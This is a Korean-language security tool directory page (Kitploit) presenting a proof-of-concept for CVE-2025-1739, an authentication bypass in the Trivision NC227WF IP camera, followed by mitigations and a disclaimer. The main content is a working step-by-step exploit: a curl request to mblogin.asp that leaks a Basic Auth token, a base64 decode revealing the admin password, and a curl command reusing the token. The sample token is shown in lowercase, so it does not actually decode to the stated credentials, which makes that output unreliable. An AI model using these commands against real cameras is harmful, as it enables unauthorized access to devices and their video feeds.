Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-1739 — 0day PoC for CVE-2025-1739 | Kitploit
도구/GitHubGitHub/n0n4m3x41/cve-2025-1739
Authentication & AuthorizationEmbedded Systems SecurityIoT SecurityVulnerability AnalysisExploitationWeb Application ExploitationLearning & Education
GitHubn0n4m3x41/cve-2025-1739

CVE-2025-1739

0day PoC for CVE-2025-1739

저장소 보기
4개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-1738 & CVE-2025-1739 — Trivision 카메라 NC227WF PoC

📋 개요

CVECVSS v3.1점수CWE유형
CVE-2025-1739AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N7.1CWE-288Basic Auth 누출을 통한 인증 우회

🔓 CVE-2025-1739 — Basic Auth 코드 노출 / 인증 우회 (CWE-288)

설명

카메라는 mblogin.asp 엔드포인트를 통해 유효한 Base64 인코딩 Basic Authentication 토큰을 유출합니다. 이 토큰은 쉽게 디코딩하여 재사용할 수 있으므로 비밀번호를 알 필요 없이 장치에 대한 무단 액세스를 얻는 데 악용될 수 있습니다.

  • 공격 벡터: 인접 네트워크 (AV:A)
  • CVSS 점수: 7.1
  • CWE: CWE-288 (대체 경로 또는 채널을 사용한 인증 우회)

페이로드

root@kitploit:~
curl -u admin:whatever http://<CAMERA_IP>:<PORT> --request-target en/mobile/mblogin.asp
이미지

응답 예시

응답에는 유효한 Basic Auth 토큰이 포함되어 있습니다:

root@kitploit:~
ywrtaw46vw5ndwvzc2fibguxmjmh

토큰 디코딩

root@kitploit:~
echo "ywrtaw46vw5ndwvzc2fibguxmjmh" | base64 -d
# Output: admin:unguessable123!

토큰 재사용

root@kitploit:~
curl -H "Authorization: Basic ywrtaw46vw5ndwvzc2fibguxmjmh" http://<CAMERA_IP>:<PORT>/

🛡️ 완화 조치

  • Trivision에서 패치된 버전을 사용할 수 있다면 펌웨어를 업그레이드하십시오.
  • 외부 접근이 차단된 전용 VLAN에 카메라를 격리하십시오.
  • 신뢰할 수 없는 네트워크 세그먼트에서 카메라의 관리 포트를 방화벽으로 차단하십시오.
  • 기본 자격 증명을 변경하고 비밀번호를 정기적으로 교체하십시오.
  • activex_pal.asp 및 mblogin.asp에 대한 예기치 않은 액세스를 모니터링하십시오.

⚖️ 면책 조항

이 저장소는 교육 및 승인된 보안 연구 목적으로만 제공됩니다. 작성자는 어떠한 오용에 대해서도 책임을 지지 않습니다. 장치를 테스트하기 전에 항상 명시적 허가를 받으십시오.

도구 다운로드